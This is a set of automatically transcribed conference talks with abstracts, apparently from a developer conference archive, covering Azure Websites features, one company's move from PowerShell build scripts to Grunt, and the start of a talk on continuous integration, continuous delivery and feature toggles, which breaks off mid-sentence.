on, Bala Pino, of course. So Bala Pino, I hit submit. That's now updated. If I could get the website to run, which it is, if I hit refresh now, Bala Pino. Stuck the landing, so, so. You guys are cruel. You only laugh when I call myself fat and when I failed. I understand Norway. So that is the bunch of the stuff that I wanted to show you guys about Azure and the different things that you can do. Now here's the big secret that I've learned screwing around with all this. Even in that moment of panic, I did not plan that, I swear. Even in that moment of panic, I felt safe. And the big secret to me to Azure websites and why you can feel safe goes like this. I'm a chef. I like to cook a lot at home and whenever I talk to people who are my friends who want to cook, they say, oh, I don't know how to cook and what if I ruin the meal or whatever. Here's the deal. If you ruin a meal, it's 20 bucks and you can get pizza and you save the meal. When I was working on hardware in that back closet, I was always afraid because what if I screwed up the hardware? It's thousands and thousands of dollars. Let me show you what happens if you screw up the website and Azure websites. One button, done. I've just deleted the website, the SQL server, everything gone and I can recreate it in 30 minutes. That's the big secret. You don't have to be afraid because it's that fast to reset. It's a couple of bucks, it's a couple of minutes and you can reset yourself. So that is what I wanted to share with you guys today. I have two minutes for questions if there are any. Awesome. Guys, thank you very much. I hope to see you tomorrow. Tweet me if you have any more questions. Thank you. Thank you.
Microsoft’s premier cloud solution for custom web applications, Windows Azure Web Sites, has brought the DevOps movement to millions of developers and revolutionized the way that servers are provisioned and applications deployed. Included with all the headline functionality are many smaller, less-known or undocumented features that serve to greatly improve developer productivity. Join Microsoft MVP and veteran web developer Nik Molnar for a whirlwind tour of these secret features and enhance your cloud development experience. This beginner session is suitable for developers both using and curious about WAWS.
10.5446/50627 (DOI)
Okay, thank you all for coming to my talk. Are you sure you want to be here? Douglas Crockford speaking, Mark Seaman are speaking. You know, some great speakers out there. Do you want to really be here? So this is a talk about the journey from Pireshell to Grunt for our build and deploy. Okay, my name is Paul Stack. I have some contact details on the screen. If anybody takes offense with what I say or wants to discuss it further, then please do get in contact with me. I'm an infrastructure engineer for OpenTable. After the last session, someone said, what does an infrastructure engineer do? I don't know. I seem to be away from the office an awful lot and I have an amazing team who are building very cool tools for our infrastructure based around using Puppet for orchestration of changes to our production systems. I'm a DevOps extremist. Over the past six, seven years, I loved CI. After CI, I thought there's got to be something else and then I really get into continuous delivery and in order to understand continuous delivery better, I started looking more in towards DevOps and getting into the DevOps world and now I just believe that it's the only way that companies can truly succeed in delivering amazing software in the best manner. I'm a conference junkie. This is my eighth conference. I feel as though of this year, it's only June. I feel as though I should go to a support group so that I can go, my name's Paul. It's been two weeks since my last conference. I enjoy going and meeting lots of new people. This is a description of where we were, where we got to, and where we went and where we're at now. We're going to be showing lots of code examples so people can see them. There's a ton of our code that's already open sourced. You'll actually be able to see a lot of what we've already written. In the beginning, when I started at OpenTable, just short of three years ago, we had a custom written build tool. It was a proprietary piece of software that was a little console application that required to be installed onto a build server. It was written in C sharp and SP.net. Two, it's probably not the best thing if we look at it now for a build tool. Back then, it was really good because it was interacting with our Git or SVN repository back then. Who still uses SVN? It was interacting with our SVN repository and being able to pull tags and it was being able to create tags for us and so on. It was extremely versatile because it took care of things like our own internal web config transformation. Our main website has got nine different variants of it, different languages across the world. This little tool managed to swap all the different web config pieces into the right place when it required. It was actually very good. It became extremely difficult to maintain. What we did is we had a build server, one build server. On that build server was this console application. Also, on that build server was Visual Studio. It became very difficult to maintain. We thought, let's start moving away from that. This was a central agent for all the builds across our web platform. This was quite a big deal. We had a lot of builds going on. When that server went down, that agent, we were in real trouble. We had the rise of PowerShell. I'm a huge fan of PowerShell. I always have been a huge fan of PowerShell. If people can understand what I'm actually saying, that's Microsoft PowerShell. It's just my silly accent. Over the next couple of months after I joined the company, my team really, we became responsible for building a new web application. The application was ASP.NET MVC app. The old tool didn't build that app. That's when we realized that things had to change. We needed to create new scripts. I had just come from a previous company that I had just gone and implemented an entire new build system. Actually, an MS build. Looking back, I don't know why I'd ever choose MS build. I guess any MS build developers, anybody like MS build? By need. Who likes the brackets? Everyone loves a bracket. I started to realize how amazing PowerShell was and how versatile it was for Windows infrastructure. On top of PowerShell, there is a DSL, the main specific language called Saki. It is not pronounced P-sake as everybody that I meet does. It's a silent P. It's got a very similar style to rake. You describe things in tasks. The best thing about it is it avoids the angle bracket tax of MS build. Does anybody know Saki? I know a couple over there do. It's a pretty awesome tool. It was originally written by a guy called James Kovacs as a version 1.0. Then it was re-released by George Matos as a version 2. As I said, I was creating things in MS build for a long time. I spent many sleepless nights trying to work out why my build scripts didn't work. It was because of brackets. Brackets and escaping of characters. DSLs are a lot easier to use and they are a little bit more fluid. They just make things a little bit better. Why Saki and not rake? I'm a reformed Microsoft fanboy. I used to be a huge fanboy and it was all about Microsoft tools for me. Because of that, I hated. I detested Ruby. I write Ruby on a regular basis now. I'm like changed completely. PowerShell had to be the way forward. If it was an MS build, and it had to be Microsoft, it had to be PowerShell. I know somebody in the crowd has written their own build script tool. This was going back like three years ago. I didn't know many other tools existed then. With all the power that PowerShell actually brings it, this is extremely versatile at what it can do for builds and deploys. PowerShell is a remote for your deployments. You can start jobs, you can set process weights, et cetera, on your build. It becomes really good. The script, look, that follows. We have a repository. The last time somebody is actually maintaining this. Originally, it was created two years ago. We did all sorts of cool stuff, but our build script effectively looked like this. We passed in some properties. We had some configuration, which was like the type of configuration, so if it's debug or release or so on and so forth. Solution directories, solution names, project names, whether it's actually, whether it's going to be packaged or published or whether this is a part build, the build number. It just started to grow exponentially. If you look at the git blame of this file, you'll see that probably five or six different people have been touching pieces of it and breaking everything. We'll discuss why that's the problem later. It was really easy. We had a task default, which depends on build, unit test, and acceptance tests. The build basically said run MS build. We had a wrapper's file, which I'll actually show you the wrappers. The wrappers is where all the nastiness is. There we go. Run MS build. Again, this has got horrendous over time. We would switch based on configuration. Because you're inside PowerShell and you can connect to all the pieces of the system, we could just use exec MS build. We could actually trigger from PowerShell and MS build script. Then you pass in all the parameters and then we actually use the output parameters to Team City to tell us when the build was ready and so on. But we'll come back to that later. After it finished the build, it would then go through a series of steps based on the crap that people added to the script. I say that in the lightest, hardest, the light hardest sense of the word crap. It just so happened that these scripts other people wanted to use. I made the biggest cardinal mistake. I made these a separate repository of their own. They were not part of my application. So therefore anybody in the company who wanted to could go and change those scripts. That was my worst mistake. We'll discuss why that was a bad mistake. Then at the end, if it was a, if you want to package it, it would go off and package the build. It would do some other DLLs and it would check some of the package. We want to make sure that the package that, when we package that up for the first time, we want to record a checksum and then when we deploy, we used to actually check that that checksum was the same because we're a SOX controlled company and you have to prove that what you built and test is exactly what is released. I don't know. Then we ran some unit tests. We had another wrapper called run unit tests. Maybe not. They're in there somewhere. We just basically passed in some configuration values of where the end unit exe is because we used to use end unit and we would pass in the directory that you would run tests against. Then we actually just passed in a couple of extra parameters where we said unit test result.xml. We want to get the result back so that we can feed that into Team City. Then we passed in the type of test, unit test. Looking back, that can 100% be refactored to the same method, just pass in having a wrapper and pass the types in rather than copying and pasting. We wanted to separate the fact that there were unit tests and there were acceptance tests and we wanted people to see that. We wanted to see that there was a distinct difference. The build script in itself was extremely simple. That's what Pyrochill gave us. The Saki notation gave us that simplicity. When it came to deployments, it became even more simple. We originally just started deploying this in a very small scale. We would just basically say get the site directory, get the package directory, the deploy folder. You would just change some, this is just like configuration, swap in the correct configuration into place. Then we would just copy the folder across the network share onto the server and then we would remove all the temporary deploy and then we would actually just do an IS reset. We would swap the system into place. As soon as we had swapped into place, we'd done an IS reset and then cleaned up. That is not a good deployment plan. It's really not a good deployment plan. That was like a V1 and that one was added two years ago. Then we started to get a little bit more involved with deployment. We had pre-deployment. We had set in load balancer statuses. We had warm-ups. We had going off and getting our artifacts. A pre-deployment was, see, we started to become much more professional with our Pyrochill scripts right here. Passing in and help messages so that people could see what they needed to pass in. It was go off to get your system from Artifactory. We use Artifactory for our packages. When you get, let me just go to the bottom, deploy site. Deploy site would basically say for each server in the list, because we could pass in a common delimited string of servers, for each one in the list, go off, get the files, extract the files to the server. Does that make sense? Really simple. We're not doing anything bad. After deploy site, we would then call the deploy configuration, which would go off and it would swap in the correct configuration based on if it was production and America or production in Japan. It would go and get the correct configuration values and put those in place as well. That was our pre-deployment. Then we would take the server off the load balancer. We would go off and we would interact with SQL server to take our server completely out of the load balancer. When it went off the load balancer and we got a good X-acode, a zero X-acode that it's worked, we would then do the final step, which would be the actual deployment in itself. All we did was call final deploy.ps1, which effectively swapped the server, swapped the folder systems around. We would take the old one, we would rename it to be old or backup or temp, and we would take the new one and rename it to be the actual folder itself. We would do an IS reset on that. Again, that is not a good deployment plan. This is going back like two years ago. We were very much as a company at the beginning of our continuous integration and continuous delivery start. It's something that takes an awful long time to implement because each environment has got its own different way of doing things, and each environment has its own stakeholders that you have to consult in order to build that pipeline. This was the first phase of it. We actually moved from a company that did manual deploys of these packages that this old C-sharp application created across and started now having a real sort of a pipeline. I call it a sort of a pipeline. Anybody any questions on those scripts? Does anybody want those scripts? You want them? We were 100% Microsoft, so that is exactly why there was no need for anything else. It was MS build and PowerShell or nothing. That was okay. We hired ASP.NET developers. Our developers all had core C-sharp knowledge. We didn't have anybody inside the company who was really pushing the bounds of other languages anyway. But yes, it was on cross-platform in any way, shape, or form. If you do want these scripts, let me know. You can have them. I won't even charge you for them. We could do all other sorts of things in here. If I show you some of our warm-up scripts, sending requests across, making sure that a get request returns a 200, and that the application warms itself up as part of the deployment. Our pipeline actually became quite good, and it looked something similar to... Sorry, that's the wrong one. We would pre-deploy the site, and then we would deploy the site. Based on parameters that we passed in, we could then say, and also warm the site up. Run that part of the script as well. Very quickly, because of so many people... There we go. Because of so many people touching this, let's go back to the actual slides. The scripts look okay. Fundamentally, there's nothing wrong with them. It's probably not the best way of doing it. As I said, people started to adapt them. One person would go, but my app needs to do this. Let's add a little if statement in there. If it's my app, then I'll do it this way. My app has this build configuration parameter. Let's add that into the case statement. All solid principles are going out the window right there. Very quickly, we get into a massive spaghetti mess, huge spaghetti mess. We ended up with a build in our system that takes 17 build parameters. Out of all sorts of rubbish going in there. We'd have deploy directories. We'd have branches because people were using branches for their things. You'd have project names. You'd have some package locations, some artifact. You'd have some hard-coded IPs. You'd have whether it's a service or a web app, it just became an absolute maintenance nightmare. But rewrites completely suck. Anybody been involved in a software rewrite? Has it been fun? Have you wanted to pull your teeth out? Yeah, they're not fun. They're really, really not fun. I'd already written one set of build scripts. Why was I going to put us through writing another set of build scripts? Do we really want another? Then we had a bit of a revolution in the company. We were no longer a Microsoft house. We were actually able to start writing applications in other languages. In the summer of 2013, we had an engineer joined us called Andy Royal. Luckily, I managed to get him on loan to my team for the first couple of months. We had just started to write a Node.js app. Somebody told me I could write a new application. I was going to choose a new language. I was unleashed. Andy wanted to learn grunt. Andy then decided why don't we start writing the build system in grunt? It's a new shiny thing. This was a year ago. None of the other ones had really come out yet. We'll look at some of the other ones a bit later. For anybody who doesn't know, grunt is a JavaScript-based task runner. You register tasks and then you can call those tasks in place. It's got a massive community ecosystem. When I rewrote the talk this morning, there were 2,954 grunt plugins available. There's new ones appearing every day. Now, you go and search for a screenshot or share or something like that. You'll probably get 20 variations of different packages, but there's a huge community present. Of course, grunt works really well with Node. You do NPM install grunt and you'll actually be able to start interacting with your Node application from it. What do the scripts look like? Right. Everything has a grunt file. We'll skip that top part. That's not really relevant. We go off and we go to a directory and we can say, for every JavaScript file in that directory, register that file itself that you find as a function, as a task that's available. At that point, you can start to, you don't have to register everything explicitly. You can let recursion happen and let it register all its own tasks. Then we can say, but register a task of default. If somebody is in my directory and types grunt, it'll do the build. If somebody runs grunt build, it'll do a clean build, a JS hint, it'll run my mock a unit test and it'll copy the build across for packaging. If somebody just wants to run mock a, what our mock a test are actually doing here is it's using an in-memory database. It's actually filling the database with known data and running acceptance test against that data. It will clear the database down and refill it. If you want to retest your code, you wouldn't want the process to start again. The last one is, if you're just in development mode, you can just run JS hint and mock a. Let's have a look. Everybody read the screen? Awesome. Grunt, simple grunt, it's gone off and it's done everything. What it's done is it's JS hinted everything and it's filled my database and it's run all my acceptance tests against the database. We have a read me that basically says you need to do a brew install of Mongo, have that running and then this interacts with Mongo in the background. At the end, it comes back and says 100 tests have passed and 121 milliseconds. We've copied the build. If I do grunt dev, we just do a JS hint and we clear the database. I can't connect to it at the minute. At that point, we can run different pieces of the system. Andy wrote a blog post. His blog post was grunt your deployments too. We were like, why do we get things built by grunt and then deployed by another system? Why can't we just get grunt to deploy our system for us? He registered a task called deploy. Deploy called a list of other tasks. It's gone off and got the artifacts. It took the app offline. It stops the application. It makes the release directory. It updates all the new sim links for the new deployment. We do an SFTP deploy. We do an NPM update. We set some configuration. We start. We wait for the application to start. We run our warm-up scripts. We verify. We put it back online and we have clean up afterwards. This is a much better pipeline straight away. It's much more explicit about exactly the tasks that it does. We're not hiding this away in Team City. This is not a slating of build tools by any way. They can just be misused in a very big way. But we have the same task locally that we can run against a test database or a test acceptance site that Team City would run in our CI environment or our pre-prod environment or our production environment. Why it looks in Team City is this. For build, we have a Team City step that says grunt. The grunt task is build. We're not hiding anything away. It's as simple as it possibly gets. There's no extra configuration parameters. What we like to use our CI tool as is just somewhere to orchestrate a job. Everything else must be encapsulated. We can go and we can have a look at the deploy step. There we go. The task is just deploy API. Again, all the logic is held inside the grunt file. There was no hidden surprises when a developer decided to run a command locally that didn't happen in production. If we have a look at some of the contents of those. We have an artifact task. We have a clean. We have a clear DB. We have get artifacts. We have HTTP. If we look at HTTP, it's just going off and just running service status pages. We have a page on our internal systems that's like service status just to make sure that the application is running. Our internal applications only. Don't go and beat us on our website. I'll note to you. We just make sure we can actually warm it up and we collect any errors if it returns an incorrect response code. It doesn't do anything too bad at all. If we have a look at something like JS, JS hint, we're basically just running a simple JS hint across all JavaScript files in the solution. Others who are good at code were actually starting to use code in their build system and in their scripting system. These are not complex scripts. Those seven lines right there, that's all available open source. You Google how to JS hint with grunt. That's almost the first result you'll get. Don't try it. Maybe it's not the first result. The point here is is that why reinvent the wheel? We had a second chance at creating a good build system, a good deploy system, and we could use that. We could use that second chance in order to make it better. We could be a lot more interested in things. Then Andy was like, okay, so we do our builds and we do our deploys. How can we run our acceptance tests? We don't want every developer to have a copy of these five systems on their machine. We don't want to be running our tests against Mac OS X when we deploy into a boot and production. What do we do? He hooked into a tool called vagrant. We have another task called grunt acceptance. What grunt acceptance does is at this point, it does a vagrant up, actually spins up a physical machine using vagrant, sorry, a VM on my physical machine using vagrant. It will run some tests against that VM and it will destroy it. If I'm in the directory, I can say grunt acceptance and it's running the vagrant up task. It goes off and it clones a VM and a boot to VM box from another repository inside my machine. It will install Mongo, it will install engine X, it will install MPM and node and all these bits and pieces and it will run all my tests against them. It takes like 10 minutes to run. Before a developer checks in some code, they take 10 minutes to go grunt acceptance, this works against a known operating system. That was huge, absolutely massive. He wrote a blog post about this called grunt your acceptance too. What we're trying to show is that we're not doing anything. We took this opportunity when we had a new app and we were like, right, what does our app need to do? We continually added new pieces to the pipeline when we needed them. The main thing, I'm just going to kill that because I don't want that spinning up, the main thing is that the build files themselves were packaged with the app. When a developer checked out the code from GitHub, they had not only the actual application code itself but they also had the build code. It meant that everything could be done on the same checkout. Developer could test everything locally. They had the vagrant file that they could test everything with. They used Redis now in there as well. We're really starting to move forward. Any questions? Awesome. Anybody just want me to shut up so we can go for lunch? We're almost there, I promise. This was for a Node.js app. Can the scripts be reused? Yes. Yes. We're reused. Yes and no. I said before that we didn't want these to be reused. We fell into the trap before having central scripts. We did not want to fall into that same trap. If another team who wanted to build and package things with Node.js app in the same way wanted to use the scripts, they would have to go and clone our repository and they would have to see what we're doing with it. That's a good thing and a bad thing because sometimes it creates silos and sometimes it creates a non-similar way of doing things at all times. But in an organization of 150 engineers, you're never all going to be doing things in the same way, especially if you have lots of languages and you're doing cross-platform development work. But there were pieces of the puzzle that could be reused. Things like pushing the artifact, clearing down a database, getting things from artifact, HTTP warm-up scripts. All of these are actually reusable scripts. If we really wanted to, we could create an NPM repository inside our company and then the engineers could go NPM install OpenTable HTTP and that would bring those down. But we're not at that point. In fact, what I can show you now is, speaking about cross-platform, this promoted offer application is actually a C-sharp application. In here, we have a grunt file right there. We have a build folder right there. If we go into the build folder, we can see that we've got some other things in here. We've got N unit. Dammit. Thank you. We have N unit. We have SQL. We have other pieces of the puzzle in there. As I said, this is a C-sharp app. If we go inside our grunt tasks, we can say here that we have build SQL. This goes off and this will build a change set from SQL server and it will store that with the build artifact. Then we have SQL command.js. We have package GitHub data, hip chat notifier, get last pin build number from Team City. This is another app that's gone through a transformation. New pieces of the pipeline were put in place because it was a more complex app to build. It wasn't just a C-sharp app. There's another one, feature dashboard, which is an MVC app that builds a mono. If it builds a mono, I can build it on my local machine using Mac. Let's do that. Then we have grunt tasks for that. We've won at the bottom called xBuild because we want to execute xBuild itself rather than MSBuild. All I have to do as a developer, if I just do grunt build, it cleans the build first. It realizes it's actually doing a C-sharp build. We're in a situation now where our packaging and our builds are in the same state locally as they are in our environment. I'm the same for deploy. If I really wanted to, right here, I could run a grunt deploy and pass in some environment data and it would go off and it would connect to those environments and do the deploy for me. It would just take a little longer because I'm going across the VPN to San Francisco. We can run any of these scripts at all times. This was a very key thing for us. Are there alternatives? It's really good to see some people here from ScriptCS because I actually put ScriptCS in there. Let's see. Thank you. I told Justin that I would put it in there. It is actually an alternative. He's going to take a picture of it because I troll these guys all the time. They're awesome about being trolled, which is really funny. ScriptCS is actually there. You can script stuff on there. I'm sorry, Adam. I should have put your tool on here as well. You've got one called Bow. Is it Bow, you pronounce it? The new hotness right now is Gulp. Anybody using Gulp? Anybody know what Gulp is? It's another JavaScript. They claim to be a streaming JavaScript framework, build framework. There's always alternatives out there. This is not saying you must go and use grunt. Grunt may not fit what you're doing. It may not. There's Gradle. If you're in the Java word, you can go and rewrite stuff in Gradle. You can continue to use PowerShell. Just be very good at what you do with it. Or you can use Make. Does anybody use Make still? Hadi Hariri wrote a blog post on basically cluttering the ecosystem with systems that are written as alternatives to Make. Why don't we just stick with Make itself? A lot of people are starting to begin to feel like that again. Scripting frameworks are the new JavaScript frameworks. If you really want to, you can go and create one in a very simple amount of time. It would be very immature and it probably wouldn't do an awful lot, but you can do it. You can write one from scratch. Why reinvent the wheel though, right? If somebody's already written quite a successful one, there's no point in rewriting the wheel. There's really no point. Do I think that PowerShell is bad for scripting? 100% not. We've come from a company where one or two people were responsible for the build script. It was like me and one other person cared. When that was the case and everyone was doing things in exactly the same way, building the same style applications in the same language, it worked fantastically. As soon as you moved away from central manage, as soon as teams were given autonomy and teams were able to go off and do bits and pieces in their own fashion, then there were variations very quickly appeared into the system. What we had is a per design choice. Centrally managed build scripts are not a good thing. Does anybody have centrally managed build scripts? They're tough. They're really tough and they can break an awful lot. We also don't write applications solely in ASP.NET or ASP.NET anymore. PowerShell for node apps, you can do it, but just because you can do it, it doesn't mean we should, right? The future for us is we just don't know. We don't know what type of apps we're going to be building next. Maybe there's a new app that we have to build next week and we'll use Gulp for it. Maybe there's a new C sharp app and we'll use script CS for it. I'm just joking. The point here is that there's so much resources available out there. We can go and we can have a look at the Grunt plug-ins website. Everybody see that? You've got Contrib, you've got Watch, Ugly Fly, Concat, CSS, Min, Less, Karma, Coffee, Compass. They're all out there. Some of these have been downloaded a huge amount of times, 400,000 times nearly for JS Hint. Anything with Contrib in front means it's a core package maintained by the Grunt team. If it doesn't have Contrib in front, then it's actually outside of Grunt themselves. This comes with its own problems, right? If I go and I say NPM install, it goes off and it downloads the word. It goes off and it downloads the word. If you depend on those external packages, people do make breaking changes to them. Be wary. If you do go and use an open source tool like this in order to build stuff, there are changes that happen all the time. Sometimes that's okay. Just be wary. Be yard full about that's the case. Let's just cancel that. I have probably 20 minutes left. We're definitely not going to take 20 minutes. We're going to take five and then I'll take a couple of minutes for questions and we can run and get in the lunch queue first. I have some tips. The tips here are think about, be mindful about what might happen in the future. You may change completely what you're doing. Don't throw all your resource at creating these amazing build scripts. Have good build scripts and reliable build scripts, but evolve them over time. As your application grows and your company needs change and your team size grows, evolve your build scripts to evolve with the application itself. 100% do not centrally manage your build scripts. I can't stress this enough. I've been bitten by this where I've had people calling me at midnight saying the builds don't work. What do you mean it doesn't work? It doesn't build. What did you do to it? I added this new parameter. We would just have this never ending list of problems. I would get in in the morning and I'll change something before I go home and the San Francisco team are blocked because I've broken their part of the build scripts. I didn't know what they were using it for. Centrally managed is tough. It's really tough. Get lots of feedback. These build scripts, is anybody not using a continuous integration tool? Who uses Team City Jenkins, bamboo? Cool. If you're not using a continuous integration tool, get a continuous integration tool. Even TFS. Just listen. If you're using a tool, that's a good thing. We'll talk about the tool in another time, but that's something different. Use Team City. There we go. Just make it simple. Make your script simple that the way that it executes inside your continuous integration tool happens on your developer machine and Jeff's developer machine. They have to be consistent. The last one is have empathy for your other developers. Don't just go and make lots of changes and not tell anyone because that makes you look like a douchebag. When you have to get phoned because you've changed their build scripts, you're the one that has to suffer. You're the one that has to apologize to the team for stopping their application at the moment. Does anybody have any questions? You must have questions. You're a CI and CD guy. How do you feel about this? Of sole packaged with your application or centrally managed build scripts? Okay. The more you get into continuous integration and continuous delivery work, the more that you'll see that having a good build system is extremely important. You must be able to rely on it. You really must. Any other questions? Yeah. Saki. Yeah. 100%. That's why I said, depend on the type of organization you're in or what type of application you're in, there are all alternatives. You must use grunt. Grunt is the best. If you need to and you're 100% Microsoft shop but you don't want to use PowerShell, then use script. It's good for that, right? Is it? Is it good? Absolutely. So there you go. Bow is even better, right? This is more of a choose what tool you're comfortable with and choose what tool is simple, okay, but it's very effective in what's getting the job done. If I would, if I was still building C sharp and.NET apps, I would 100% still be using PowerShell because I just, I find it phenomenal. Every time they make a new release of PowerShell, it adds so much more to the language. I don't understand the C sharp building, C sharp thing. Hey, I'm a Ruby developer. I don't understand these things, but go off and try some things. Go off and try some tools. Go and get, if you're a.NET developer, go and try Gradle. There's like 26 chapters of documentation on Gradle. That'll be a fun reading before you go to bed one evening. But there's lots of tools out there. Choose a tool that, get advice. Twitter's a great place of, I have this application to be built. What technology should I build it in? You'll probably get 100 responses saying, gulp, gulp. And then you'll get a load of responses from the C sharp guys going script or PowerShell. But speak to people. Get some insight into how they've evolved their build script and how they've evolved their environment going forward. If anybody wants to send me any rant or tells me I'm wrong, please do. I haven't put my email on there because I'm awful at email. I have a backlog of emails to reply to. So tweet me because I am addicted to Twitter. I'm actually always on Twitter. So challenge me. Tell me why I shouldn't be building something in Grunt. I'll happily, happily have a conversation with people about it. Continuous integration, continuous delivery is something I'm very passionate about. And being able to communicate with other people on their experiences always helps me as well. There's always other people's views on this. I'm not the right, I'm not always right on this. You've quoted. But this is true, right? We all have our own ways of doing things. Let's go and get some lunch. Thanks guys. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you.
I am a huge fan of PowerShell. I use it for Windows infrastructure automation. I used to use it for build and deploy systems for ASP.NET applications. I feel that there are simpler alternatives for build and deploy systems out there. This is when I was introduced to Grunt. Grunt is a JavaScript based task runner. As it is JavaScript, it is multiplatorm. It can be used to build and deploy ASP.NET applications as well as Node.JS applications. During this talk, I will create a build and deploy system with Grunt. This will replace the PowerShell build and deploy system that I already have. I will then integrate the new Grunt scripts with TeamCity to show how simple it is.
10.5446/50631 (DOI)
Good to go a supernova is a stellar explosion that easily Outshines everything around it It's an explosion with Impredictable impact on galaxies on planets on stars And that's pretty much what our releases looked like a few years ago probably three to four years ago Would Users be able to use our website after having released it would I be able to sign on and sign in again and How can we deliver without being offline to about 10 million users frequently? That's our question today Our target back then was to establish a Smoothly running system of releases Maybe as smooth as this bottles in the animated graphics This production line superst never stop to run as long as bottles of water are produced Our releases When to never stop as long we produce software I Am Robert I'm pretty much excited to be here today. This is my first time in Oslo, and I'm From Germany. I'm with good a frage net. So let's do a first part. Who of you has ever heard of good a frage net That's not too much they should have included an advertisement slate for next but I keep it short I'm with Germany's biggest question-answer community with all of our users producing the content and we enjoy about a little more than 17 million registered users with about almost 60 million wizards per month and I've been into agile product developments crumb Kanban XP for about six years now and I'm in charge of agile product management with good a frage And our goal at good a frage is to transform us into a agile enterprise including Marketing sales finance HR and all these other business units being guided by the agile manifesto If I'm not presenting at a conference I do have hobbies and I do have a private project I'm building a house together with my wife and I'm Pretty excited to be joined today by a good friend of mine whom I met at out of scouts 24 the company I was with before a giant good a frage and whom I whom I was with at a scrum team back at out of scouts 24 Okay, my name is Simon Never mind my last name. It's unpronounceable in any other language than German. Well, but very naturally I'm married. I have a little daughter and I've been developing software for 13 years. I'm with autoscout 24 in Munich since 2010 and I'm leading eight developer teams there a few words about the company so that you have some context About what we're talking Has anybody heard ever heard of autoscout 24? Oh? Yeah, so I win then Has anybody maybe even bought a car or sold a car through our website? No, okay. That's pretty much the same number. Yeah. Yeah. Yeah, okay, okay now autoscout 24 was born as a platform for buying and selling cars We help finding people the right car for them and the services if they already have a car We're present in 18 countries unfortunately not in Norway or another new northern European countries So it's not surprised that nobody would have heard of us About 10 million people use autoscout 24 every month that is to websites and apps on mobile phones So it's all about cars, but I always say at heart. We're actually an IT company We have about a hundred employees in IT and we build good software and that's we want to talk about today You can take the seats over there if you want Give me a minute So back in 2009 what five years ago we started to introduce scrum Let us do a second part who of you has ever made use of the scrum framework That's my people okay So back in 2009 this meant to us splitting off our project teams into cross-functional teams comprising of a product owner up to six software developers a a quality manager and a scrum master and we did Report important improvements. We enjoyed better quality in terms of less bucks and As well humans we do make mistakes whenever we made a mistake We've got to realize this earlier when developing at an earlier stage So we gained an efficiency and in speed. We were about to have increments of our software ready frequent times a week Nevertheless we're forced to be faced with monthly releases And this is not what agile talks about right it talks about Shipping software of value for customers as often as possible the moment. It's done Not with us where to wait for another scheduled release So we actually realize actually our releases hurt it a lot we're knowing they were exhausting and we just didn't like them so What did you about it why not trying to ship software Life the time it's ready So we wanted to ship on your features So we wanted to ship on your features when they were ready. We did not want to wait any longer for a scheduled release We didn't want to think about releases as The way kind of a leftover from the last sprint and anyone not me Not my team has to ship it Unfortunately this like your motivation. We did not enjoy drive. It was exhausting stressful And of course error prone And even worse where to realize that this was kind of what a fallish developing software and Releasing it at a very very late stage bad things And We always keep in mind if it's not us who ships the features It's our competitors And as change was only present back then with our agile mindset We just tried to change things Even though we did not know what continue continuous life delivery is all about We just kicked it off. The only thing we knew for sure is there will be lots of changes incremental changes Getting things done one by one So the first thing we try to understand is Why are our releases time-consuming? Why are they annoying? Why do we have to wait for another release to be scheduled? And keep comparing our releases to Containerships they are large They're carrying many many containers It takes long hours or even the weeks for the ship to arrive the next Harbor What if a container breaks how can you find it? How can you fix it? And it's pretty much the same with our releases We're carrying many many features per release a Release took us one week To get at life from the start of delivery until yes, we're live And a frequency was about one release per month And we did find backs while releasing and we did have dependencies in our features so it was just difficult to find them and if we found a bug Shall we wait for the other teams to fix that single bug but being aware of the dis will delay the scheduled release So in order there was room to improve our releases The first study that popped up to our minds was if we make it to to develop software independently That we should be able to ship it independently and that's what we tried feature branching To us this meant Will have dedicated develop an environments per user story hence per team as one team is developing on one user story at a time And hey, that was great. That was cool. That was fun because our main line was green all over the sprint But we had to pay our dues at the end of the sprint because if up to six teams are developing software in sync They all have to merge this back to the main line at the end of the sprint probably at the last day of the sprint And this is huge effort to just orchestrate all these teams merging back their code to the main line and to be honest This very very late integration of software resulted in more obstacles than ever before So we tried to get rid of it a feature branching and try to focus back on what is known among professional software engineers as continuous integration So continuous integration is nothing new we've been hearing that for years and years I still want to talk about it again because I believe there are two big misconceptions that we still have today with continuous integration And the first is the one that we had we thought we could do continuous integration on a branch But if you use feature branches your by definition not integrating continuously and Keeping changes separate over time is not continuous integration and will cause problems So we do not use branches anymore. We develop everything on a main line that is straight like this road and We merge all changes that Bailey daily onto it. So this leaves us with little merges with only a Days worth of changes of a person of a pair So what does this look like? We have team city running which on every commit or push In the case of git pulls the sources from source control builds runs unit and integration tests and study code Analysis and installs it on a test environment Now is this continuous integration? This is technology that works and it's nice, but and I believe here is the second misconception of continuous integration Continuous integration is not about technology. It's about a mindset. It is not a server that compiles and installs something automatically somewhere It's about developing software that works all the time that is always ready to ship and And without this continuity the best build server doesn't help Now of course changing software is not as smooth as this river It always comes in chunks, but the more changes you dam up the more problems you'll have and In this way real continuous integration is a foundation for continuous delivery So when somebody asks me now, do you do continuous integration? I don't say yeah, I have junkins running or team city or TFS or whatever it is I say yeah, we do not do feature branches and we're sometimes red, but we're mostly green. So go to go live So what we do is we do not release every commit which you could understand under under continuous delivery But we want to always be able to release and As a developer, I know Everything that I commit will go live Okay, that's no wonder, but I don't know when it might be right after I commit or push or it might be the next day I only know everything that I commit has to work because it might go live right away and This thing that every commit must be releasable Requires a lot of discipline, of course Now we have one Mainline we do continuous integration on it We want to be able to release at any time But we also have several teams working on on code base and each team maybe develops different features at one time Now not all these features are complete at the same time. So we definitely release incomplete features How can you do this without creating the big chaos? There are different possibilities first one is maybe just hide new functionality until it's complete So if you build a new page you would put the links into the new page only when the page is ready Or you can build stuff incrementally you first build the data access layer than the business logic than The display logic and you enable editing the data only when everything else is complete What we also use a lot is feature toggles who has heard of feature toggles Okay, it's also called feature flippers or switches or stuff. I see many of you now Let me just give a quick example of how we do this and the learnings from it. Um, This is an part of the central Configuration of one part of our platform, which is called garage portal. It's basically a service that enables Garages to offer their services online and users to find those services and compare them and book them online So this is YAML just because it's simple and readable and you can see four feature toggles Each has a name and the settings for our different environments So dev would be the local developer machines CI is the environment where the continuous integration server installs the latest version and live is the live environment You can for example see this Future offer toggle which is only switched on on the local machine. So it's inactive development You have to support chat toggle which is already switched on on CI So it's being tested and the all service funnel is switched on on all environments. So it's probably Ready to be taken out of the code base Switch status How does this look in the code when we use it? This is a part of the main page where the garage can edit its data It's an ASP. Do not MVC razor view because that net is our main development platform, but whole feature toggle things basically technology Technostics you can do it in every in every technology When the features on we show a partial where the garage can edit a 